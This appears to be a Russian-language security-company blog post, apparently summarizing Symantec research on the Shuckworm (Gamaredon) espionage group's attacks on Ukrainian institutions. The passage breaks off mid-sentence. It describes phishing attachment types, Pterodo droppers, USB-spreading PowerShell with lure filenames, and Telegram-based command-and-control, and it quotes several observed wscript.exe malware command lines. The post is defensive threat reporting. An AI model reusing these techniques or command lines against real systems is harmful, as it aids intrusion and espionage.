{"id":9367,"date":"2023-08-28T13:33:44","date_gmt":"2023-08-28T10:33:44","guid":{"rendered":"https:\/\/oberig-it.com\/bez-kategoryy\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/"},"modified":"2023-08-30T11:43:06","modified_gmt":"2023-08-30T08:43:06","slug":"shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy","status":"publish","type":"post","link":"https:\/\/oberig-it.com\/ru\/stati\/shuckworm-neustannaya-rossijskoj-kiberkampanii-protiv-ukrainy\/","title":{"rendered":"Shuckworm: \u041d\u0435\u0443\u0441\u0442\u0430\u043d\u043d\u0430\u044f \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0430\u044f \u043a\u0438\u0431\u0435\u0440\u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0423\u043a\u0440\u0430\u0438\u043d\u044b"},"content":{"rendered":"<p>\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u0432\u043e\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0441\u0438\u043b \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f.<\/p>\n<p>\u0428\u043f\u0438\u043e\u043d\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Shuckworm \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0423\u043a\u0440\u0430\u0438\u043d\u0443, \u0441\u0440\u0435\u0434\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u2013 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u044b, \u0432\u043e\u0435\u043d\u043d\u044b\u0435 \u0438 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438.<\/p>\n<p>\u0412 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 Shuckworm \u0443\u0434\u0430\u0432\u0430\u043b\u043e\u0441\u044c \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0432\u0448\u0438\u0435\u0441\u044f \u0434\u043e \u0442\u0440\u0435\u0445 \u043c\u0435\u0441\u044f\u0446\u0435\u0432. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u043f\u044b\u0442\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0438 \u043f\u043e\u0445\u0438\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0442\u0430\u043a\u0443\u044e \u043a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e \u0433\u0438\u0431\u0435\u043b\u0438 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0445 \u0432\u043e\u0435\u043d\u043d\u043e\u0441\u043b\u0443\u0436\u0430\u0449\u0438\u0445, \u043e \u0431\u043e\u0435\u0432\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f\u0445 \u0438 \u0430\u0432\u0438\u0430\u0443\u0434\u0430\u0440\u0430\u0445 \u043f\u0440\u043e\u0442\u0438\u0432\u043d\u0438\u043a\u0430, \u043e \u0437\u0430\u043f\u0430\u0441\u0430\u0445 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u044f, \u043e \u0432\u043e\u0435\u043d\u043d\u043e\u0439 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0435 \u0438 \u0442.\u0434.<\/p>\n<p>\u0421\u0442\u0440\u0435\u043c\u044f\u0441\u044c \u043e\u043f\u0435\u0440\u0435\u0434\u0438\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435, Shuckworm \u043d\u0435\u043e\u0434\u043d\u043e\u043a\u0440\u0430\u0442\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u043b \u0441\u0432\u043e\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439, \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u044f \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438 \u043d\u0435\u0434\u043e\u043b\u0433\u043e\u0432\u0435\u0447\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u043e\u0432\u044b\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043f\u043e USB.<\/p>\n<p>Shuckworm (\u043e\u043d\u0430 \u0436\u0435 Gamaredon, Armageddon) \u2013 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0420\u043e\u0441\u0441\u0438\u0435\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u0441\u0432\u043e\u0435\u0433\u043e \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0432 2014 \u0433\u043e\u0434\u0443 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0438\u043b\u0430 \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043d\u0430 \u0423\u043a\u0440\u0430\u0438\u043d\u0435. \u0423\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u043b\u0438\u0446\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0424\u0421\u0411) \u0420\u043e\u0441\u0441\u0438\u0438.<\/p>\n<p><strong>\u0422\u0430\u043a\u0442\u0438\u043a\u0430, \u043f\u0440\u0438\u0435\u043c\u044b \u0438 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0432\u0438\u0440\u0443\u0441\u043e\u043c Shuckworm<\/strong><\/p>\n<p>\u0418\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0436\u0435\u0440\u0442\u0432 \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e Shuckworm \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c \u0436\u0435\u0440\u0442\u0432\u0430\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c\u0438, \u043f\u0440\u0438\u0447\u0435\u043c \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u043e\u0431\u043e\u0439 \u0444\u0430\u0439\u043b\u044b \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0442\u0438\u043f\u043e\u0432, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a:<\/p>\n<ul>\n<li>.docx<\/li>\n<li>.rar (RAR archive files)<\/li>\n<li>.sfx (self-extracting archives)<\/li>\n<li>.lnk<\/li>\n<li>.hta (HTML smuggling files)<\/li>\n<\/ul>\n<p>\u041d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0435 Symantec \u0437\u0430\u043c\u0430\u043d\u0438\u0432\u0430\u043d\u0438\u044f \u0436\u0435\u0440\u0442\u0432 \u043a\u0430\u0441\u0430\u043b\u0438\u0441\u044c, \u0432 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u043b\u0438\u043a\u0442\u043e\u0432, \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0433\u043e \u0441\u0443\u0434\u043e\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0430, \u0431\u043e\u0440\u044c\u0431\u044b \u0441 \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c\u044e, \u0437\u0430\u0449\u0438\u0442\u044b \u0434\u0435\u0442\u0435\u0439 \u0438 \u0442.\u0434.<\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0436\u0435\u0440\u0442\u0432 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u043b\u0438 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043e, \u0447\u0442\u043e Shuckworm \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 PowerShell \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0435\u0433\u043e \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430 Pterodo \u0447\u0435\u0440\u0435\u0437 USB. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Symantec, \u0432\u0445\u043e\u0434\u044f\u0449\u0435\u0439 \u0432 \u0441\u043e\u0441\u0442\u0430\u0432 Broadcom, <a href=\"https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/shuckworm-intense-campaign-ukraine\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #0000ff;\">\u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2022 \u0433\u043e\u0434\u0430 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0432 \u0441\u0432\u043e\u0435\u043c \u0431\u043b\u043e\u0433\u0435 \u0441\u0442\u0430\u0442\u044c\u044e \u043e Backdoor.Pterodo<\/span><\/a>, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043e\u043f\u0438\u0441\u0430\u043b\u0438 \u0447\u0435\u0442\u044b\u0440\u0435 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0441\u043e \u0441\u0445\u043e\u0436\u0435\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e. \u042d\u0442\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u043e\u0431\u043e\u0439 \u0434\u0440\u043e\u043f\u043f\u0435\u0440\u044b Visual Basic Script (VBS), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0444\u0430\u0439\u043b VBScript, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 (shtasks.exe) \u0434\u043b\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u0441\u0442\u0432\u0430 \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e-\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (C&amp;C).<\/p>\n<p>\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u0434\u0430\u0447 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0445 \u0441\u0442\u0440\u043e\u043a:<\/p>\n<ul>\n<li>CSIDL_SYSTEM\\wscript.exe &#171;CSIDL_PROFILE\\appdata\\local\\temp\\desert&#187; \/\/e:vbscript \/\/b \/dmc \/j2k \/spl \/nff<\/li>\n<li>CSIDL_SYSTEM\\wscript.exe &#171;CSIDL_PROFILE\\favorites\\jumper.asf&#187; \/\/e:vbscript \/\/b \/asf \/mdf \/nab \/apk<\/li>\n<li>wscript.exe &#171;C:\\Users\\[REDACTED]\\Contacts\\delightful.abk&#187; \/\/e:vbscript \/\/b \/cfg \/mdm \/cfm \/mp4<\/li>\n<\/ul>\n<p>\u041d\u043e\u0432\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 PowerShell \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0431\u044f \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 \u0438 \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0444\u0430\u0439\u043b \u0431\u044b\u0441\u0442\u0440\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c rtk.lnk. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u0430\u043a\u0438\u0435 \u0438\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u0430\u043a &#171;porn_video.rtf.lnk&#187;, &#171;do_not_delete.rtf.lnk&#187; \u0438 &#171;evidence.rtf.lnk&#187;, \u043f\u044b\u0442\u0430\u044f\u0441\u044c \u0437\u0430\u043c\u0430\u043d\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u044d\u0442\u0438 \u0444\u0430\u0439\u043b\u044b. \u0418\u043c\u0435\u043d\u0430 \u044d\u0442\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u0430\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u044b \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u043e\u043c \u044f\u0437\u044b\u043a\u0435, \u043d\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043d\u0438\u0445 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u043c.<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0441\u043a\u0440\u0438\u043f\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435 \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u043a\u043e\u0432, \u043a\u043e\u043f\u0438\u0440\u0443\u044f \u0441\u0435\u0431\u044f \u043d\u0430 \u0432\u0441\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0441\u044a\u0435\u043c\u043d\u044b\u0435 \u0434\u0438\u0441\u043a\u0438 \u2013 USB-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u0438. \u042d\u0442\u0438 USB-\u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u0438, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u043b\u0430\u0442\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u0441\u0435\u0442\u044f\u043c \u0436\u0435\u0440\u0442\u0432 \u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u043a \u043c\u0430\u0448\u0438\u043d\u0430\u043c \u0441 \u0432\u043e\u0437\u0434\u0443\u0448\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u0445-\u0436\u0435\u0440\u0442\u0432\u0430\u0445.<\/p>\n<p>\u0412 \u0445\u043e\u0434\u0435 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 Symantec \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438, \u043a\u0430\u043a \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 C&amp;C-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u0441\u0435\u0440\u0432\u0438\u0441 \u043e\u0431\u043c\u0435\u043d\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 Telegram \u0434\u043b\u044f \u0441\u0432\u043e\u0435\u0439 C&amp;C-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b. \u0412 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0434\u043b\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0430\u0434\u0440\u0435\u0441\u043e\u0432 C&amp;C \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u043c\u0438\u043a\u0440\u043e\u0431\u043b\u043e\u0433\u043e\u0432 Telegram \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Telegraph.<\/p>\n<p>.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-9363 size-large\" src=\"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-1024x357.jpg\" alt=\"\" width=\"640\" height=\"223\" srcset=\"https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-1024x357.jpg 1024w, https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-300x105.jpg 300w, https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-768x268.jpg 768w, https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-24x8.jpg 24w, https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-36x13.jpg 36w, https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny-48x17.jpg 48w, https:\/\/oberig-it.com\/wp-content\/uploads\/2023\/08\/malyunok-1-symantec-shuckworm-nevtomna-rosijska-kiberkampaniya-proty-ukrayiny.jpg 1480w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/p>\n<p><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 1. \u0423\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0438\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 Telegraph \u0434\u043b\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0430\u0434\u0440\u0435\u0441\u043e\u0432 C&amp;C<\/em><\/p>\n<p>Shuckworm, \u043a\u0430\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0432\u043e\u044e C&amp;C-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0445 \u043f\u0435\u0440\u0438\u043e\u0434\u043e\u0432 \u0432\u0440\u0435\u043c\u0435\u043d\u0438, \u0447\u0442\u043e \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0441\u0442\u044c \u0435\u0433\u043e C&amp;C \u043f\u0440\u0438 \u043f\u043e\u0438\u0441\u043a\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0435\u0439 \u0438\u043b\u0438 \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u043d\u0438\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0435\u0439 \u0432\u043e\u0435\u0434\u0438\u043d\u043e. \u041e\u0434\u043d\u0430\u043a\u043e \u0433\u0440\u0443\u043f\u043f\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 SSL-\u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u043c\u0435\u044e\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u0449\u0438\u0435 \u0447\u0435\u0440\u0442\u044b, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043e \u0432 \u0446\u0435\u043b\u044f\u0445 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f. Symantec \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, 